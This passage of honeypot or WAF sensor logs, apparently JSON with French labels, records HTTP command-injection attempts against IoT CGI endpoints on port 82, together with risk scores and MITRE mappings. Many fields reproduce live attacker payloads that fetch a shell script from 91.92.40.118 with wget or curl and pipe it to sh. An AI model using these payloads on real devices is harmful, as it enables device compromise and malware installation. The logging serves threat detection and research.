\u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 82, \u0022protocol_emulated\u0022: null, \u0022tags_summary\u0022: [\u0022INT-http_sensitive\u0022, \u0022INT-upstream\u0022, \u0022INT-waf-score\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022Http Sensitive\u0022, \u0022Upstream\u0022, \u0022Waf Score\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022T1083\u0022, \u0022mitre_technique\u0022: \u0022T1083\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20alcatel%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20alcatel%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20al\u2026\u0022, \u0022request_line\u0022: \u0022GET \/cgi-bin\/masterCGI?ping=nomip\u0026user=;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20alcatel%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20alcatel%3Bcurl%20http\u2026\u0022, \u0022port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022config file probe \u00b7 via HTTP:82 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/wget.sh%20-O-%7Csh%20-s%20alcatel%3Bbusybox%20\u2026\u0022, \u0022evidence_snippet\u0022: \u0022GET \/cgi-bin\/masterCGI?ping=nomip\u0026user=;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20alcatel%3Bbusybox%20wge\u0022, \u0022target_port_label\u0022: \u002282 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 7 tag(s) WAF\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 100 % \u2014 Score WAF 100 \u00b7 7 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022meta_truncated\u0022: true, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u002282\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022anomaly:high-entropy-query\u0022, \u0022http_no_ua\u0022, \u0022http_probe_cgi_bin\u0022, \u0022http_sensitive_path\u0022, \u0022http_suspicious_params\u0022, \u0022iot_http_endpoint\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:82","http_user_agent":null,"http_referer":null,"tags":"[\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022anomaly:high-entropy-query\u0022, \u0022http_no_ua\u0022, \u0022http_probe_cgi_bin\u0022, \u0022http_sensitive_path\u0022, \u0022http_suspicious_params\u0022, \u0022iot_http_endpoint\u0022]","anomalies":"[\u0022high-entropy-query\u0022]","severity":10,"bytes_in":296},{"id":11809372,"ip":"45.153.34.219","ts":"2026-07-14 02:18:15.000000","proto":"tcp","src_port":55360,"dst_port":82,"service":"http","classification":"cmd_injection","waf_score":13,"waf_tags":"[\u0022950324:rce-0\u0022, \u0022950468:nosqli-3\u0022]","http_method":"GET","http_target":"\/cgi-bin\/;cd","sensor_id":"paris-1","meta":"{\u0022http_header_count\u0022: 2, \u0022http_query_params\u0022: 0, \u0022http_path_depth\u0022: 2, \u0022http_path_ext\u0022: null, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u0022b00c56701bd04898edc8a488547d32d613363649\u0022, \u0022http_target_hash\u0022: \u0022d405befa78aaecee1efcf37cb58895c28b2ff19c\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022GET\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 231, \u0022payload_entropy\u0022: 5.1144420837809434, \u0022port_category\u0022: \u0022well_known\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 82, \u0022risk_waf\u0022: 60.0, \u0022risk_classification\u0022: 85.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 35.0, \u0022risk_novelty\u0022: 25.0, \u0022risk_boost\u0022: 0, \u0022risk_granularity\u0022: 5.3, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 60.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 25.0}, \u0022risk_score\u0022: 54, \u0022tag_count\u0022: 6, \u0022anomaly_count\u0022: 0, \u0022campaign_key\u0022: \u0022d4bc0caaddabeda25aa640bffdc8c3366b0aced5\u0022, \u0022event_fingerprint\u0022: \u002242c595ff27ba1dd6eb2da32a9d69851d3218f5fc\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag rce-0) \u00b7 Sonde fichier sensible \/ config \u00b7 confiance 100%\u0022, \u0022confidence\u0022: 1.0, \u0022classification_confidence\u0022: 1.0, \u0022precision_score\u0022: 304, \u0022precision_signals\u0022: [\u0022MITRE-T1059\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0146\u0022], \u0022kb_rule_ids\u0022: [\u0022MITRE-T1059\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0146\u0022], \u0022matched_patterns\u0022: [\u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0146\u0022, \u0022pat-0103\u0022], \u0022matched_pattern_names\u0022: [\u0022CRS 932100 cmd exec\u0022, \u0022CRS 932120 pipe chain\u0022, \u0022CRS 932205\u0022, \u0022LFI Double-dot bypass\u0022], \u0022pattern_ids\u0022: [\u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0146\u0022, \u0022pat-0103\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 60.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 54}, \u0022named_classification_skipped\u0022: false, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 100.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u0022f54bfee92013ec5be6db921f5158eff6\u0022, \u0022path_pattern_hash\u0022: \u002260d5de007ff2546f34f0bc3749dc5e1b\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 54}, \u0022payload_preview\u0022: \u0022GET \/cgi-bin\/;cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s wavlink;busybox wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s wavl\u0022, \u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/cgi-bin\/;cd\u0022, \u0022waf_tags\u0022: [\u0022950324:rce-0\u0022, \u0022950468:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022rce-0\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022GET \/cgi-bin\/;cd HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022GET \/cgi-bin\/;cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s wavlink;busybox wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s wavlink;curl http:\/\/91.92.40.118\/wget.sh|sh -s wavlink HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nConnection: close\\r\\n\\r\\n\u0022, \u0022payload_snippet\u0022: \u0022GET \/cgi-bin\/;cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s wavlink;busybox wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s wavl\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/cgi-bin\/;cd\u0022, \u0022waf_tags\u0022: [\u0022950324:rce-0\u0022, \u0022950468:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022rce-0\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022GET \/cgi-bin\/;cd HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022GET \/cgi-bin\/;cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s wavlink;busybox wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s wavlink;curl http:\/\/91.92.40.118\/wget.sh|sh -s wavlink HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nConnection: close\\r\\n\\r\\n\u0022, \u0022payload_snippet\u0022: \u0022GET \/cgi-bin\/;cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s wavlink;busybox wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s wavl\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag rce-0) \u00b7 Sonde fichier sensible \/ config \u00b7 confiance 100%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre_techniques\u0022: [\u0022T1059\u0022, \u0022T1190\u0022], \u0022mitre\u0022: \u0022T1059\u0022, \u0022threat_family\u0022: [\u0022rce_probe\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u0022d3c87d300b737eca334b877f8f6930643e8158be\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/cgi-bin\/;cd\u0022, \u0022request_line\u0022: \u0022GET \/cgi-bin\/;cd HTTP\/1.1\u0022, \u0022port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022GET \/cgi-bin\/;cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s wavlink;busybox wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s wavl\u0022, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:82 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/cgi-bin\/;cd\u0022, \u0022target_port_label\u0022: \u002282 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Injection de commande (tag rce-0) \u00b7 Sonde fichier sensible \/ config \u00b7 confiance 100%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Injection de commande (tag rce-0) \u00b7 Sonde fichier sensible \/ config \u00b7 confiance 100%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 54\/100 (Moyen) \u2014 MITRE T1059 \u2014 confiance 100 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 100, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 60.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 54}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 54, \u0022risk_label\u0022: \u0022Moyen\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 82, \u0022protocol_emulated\u0022: null, \u0022tags_summary\u0022: [\u0022MITRE-T1059\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0146\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022MITRE-T1059\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0146\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022T1059\u0022, \u0022mitre_technique\u0022: \u0022T1059\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/cgi-bin\/;cd\u0022, \u0022request_line\u0022: \u0022GET \/cgi-bin\/;cd HTTP\/1.1\u0022, \u0022port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:82 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/cgi-bin\/;cd\u0022, \u0022evidence_snippet\u0022: \u0022GET \/cgi-bin\/;cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s wavlink;busybox wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s wavl\u0022, \u0022target_port_label\u0022: \u002282 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 100 % \u2014 Score WAF 60 \u00b7 2 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u002282\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950324:rce-0\u0022, \u0022950468:nosqli-3\u0022, \u0022http_no_ua\u0022, \u0022http_probe_cgi_bin\u0022, \u0022http_sensitive_path\u0022, \u0022iot_http_endpoint\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"\/tmp;wget","http_host":"62.3.50.33:82","http_user_agent":null,"http_referer":null,"tags":"[\u0022950324:rce-0\u0022, \u0022950468:nosqli-3\u0022, \u0022http_no_ua\u0022, \u0022http_probe_cgi_bin\u0022, \u0022http_sensitive_path\u0022, \u0022iot_http_endpoint\u0022]","anomalies":"[]","severity":7,"bytes_in":231},{"id":11809374,"ip":"45.153.34.219","ts":"2026-07-14 02:18:15.000000","proto":"tcp","src_port":55364,"dst_port":82,"service":"http","classification":"lfi_path_traversal","waf_score":54,"waf_tags":"[\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022]","http_method":"GET","http_target":"\/Security\/auditLog\/search?logTime=0;%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20hik3%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20hik3%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20hik3%60","sensor_id":"paris-1","meta":"{\u0022http_header_count\u0022: 2, \u0022http_query_params\u0022: 1, \u0022http_path_depth\u0022: 3, \u0022http_path_ext\u0022: null, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u0022b00c56701bd04898edc8a488547d32d613363649\u0022, \u0022http_target_hash\u0022: \u00227069cd407ab69cbe41d2f22706d4ca61213e53cb\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022GET\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 292, \u0022payload_entropy\u0022: 5.16298676274392, \u0022port_category\u0022: \u0022well_known\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 82, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 78.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 35.0, \u0022risk_novelty\u0022: 30.0, \u0022risk_boost\u0022: 0, \u0022risk_granularity\u0022: 6.2, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 78.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 30.0}, \u0022risk_score\u0022: 60, \u0022tag_count\u0022: 10, \u0022anomaly_count\u0022: 1, \u0022campaign_key\u0022: \u0022a434e1cd9149ef2a922f543860269d6d9e766584\u0022, \u0022event_fingerprint\u0022: \u0022d53359b26a568c5237c07be81e4eadf98e931f85\u0022, \u0022classification_reason\u0022: \u0022Type \u00ab lfi_path_traversal \u00bb (signaux protocolaires) \u00b7 confiance 59%\u0022, \u0022confidence\u0022: 0.59, \u0022classification_confidence\u0022: 0.59, \u0022precision_score\u0022: 70, \u0022precision_signals\u0022: [\u0022CRS-930100-sub\u0022], \u0022kb_rule_ids\u0022: [\u0022CRS-930100-sub\u0022], \u0022matched_patterns\u0022: [\u0022pat-0103\u0022], \u0022matched_pattern_names\u0022: [\u0022LFI Double-dot bypass\u0022], \u0022pattern_ids\u0022: [\u0022pat-0103\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 78.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 30.0, \u0022risk_score\u0022: 60}, \u0022named_classification_skipped\u0022: false, \u0022classification_parent\u0022: \u0022path_traversal\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 59.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u0022dded28d5fb031a68b702ea014e53e4d6\u0022, \u0022path_pattern_hash\u0022: \u0022b30061e72d047d96ba099ac8376cce65\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 60}, \u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20hik3%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20hik3%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20hik3%60\u0022, \u0022query_string\u0022: \u0022logTime=0;%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20hik3%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20hik3%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20hik3%60\u0022, \u0022waf_tags\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022, \u0022redir-1\u0022], \u0022request_line\u0022: \u0022GET \/Security\/auditLog\/search?logTime=0;%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20hik3%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20hik3%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20hik3%60 HTTP\/1.1\u0022, \u0022payload_snippet\u0022: \u0022GET \/Security\/auditLog\/search?logTime=0;%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20hik3%3Bbusybox%20wge\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20hik3%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20hik3%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20hik3%60\u0022, \u0022query_string\u0022: \u0022logTime=0;%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20hik3%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20hik3%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20hik3%60\u0022, \u0022waf_tags\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022, \u0022redir-1\u0022], \u0022request_line\u0022: \u0022GET \/Security\/auditLog\/search?logTime=0;%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20hik3%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20hik3%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20hik3%60 HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022GET \/Security\/auditLog\/search?logTime=0;%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20hik3%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20hik3%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20hik3%60 HTTP\/1.1\\r\\nHost: \u0022, \u0022payload_snippet\u0022: \u0022GET \/Security\/auditLog\/search?logTime=0;%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20hik3%3Bbusybox%20wge\u0022, \u0022classification_reason\u0022: \u0022Type \u00ab lfi_path_traversal \u00bb (signaux protocolaires) \u00b7 confiance 59%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre\u0022: \u0022TA0001\u0022, \u0022threat_family\u0022: [\u0022path_traversal\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u00225f13f3d6461a32ae4660b8036affc3ac9dcc9e60\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20hik3%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20hik3%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20hik3%60\u0022, \u0022request_line\u0022: \u0022GET 